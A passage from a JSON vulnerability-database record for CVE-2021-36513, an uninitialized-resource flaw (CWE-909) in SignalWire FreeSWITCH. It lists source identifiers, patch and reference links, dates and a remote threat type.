"db": "CNNVD",
"id": "CNNVD-202110-1263",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397762",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-36513",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"id": "VAR-202110-0919",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397762"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:16:16.368000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Usage-of-uninitialized\u00a0value\u00a0#1245 GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/issues/1245"
},
{
"title": "FreeSWITCH Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=167098"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-909",
"trust": 1.1
},
{
"problemtype": "Inadequate resource initialization (CWE-909) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://newreleases.io/project/github/signalwire/freeswitch/release/v1.10.6"
},
{
"trust": 1.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"trust": 1.8,
"url": "https://github.com/signalwire/freeswitch/issues/1245"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36513"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/909.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-397762"
},
{
"date": "2021-10-18T00:00:00",
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"date": "2022-09-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"date": "2021-10-18T17:15:07.913000",
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"date": "2021-10-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-22T00:00:00",
"db": "VULHUB",
"id": "VHN-397762"
},
{
"date": "2021-10-22T00:00:00",
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"date": "2022-09-29T07:34:00",
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"date": "2021-10-22T15:11:45.757000",
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"date": "2021-10-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SignalWire\u00a0freeswitch\u00a0 Vulnerability in resource initialization deficiency in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
],
"trust": 0.6
}
}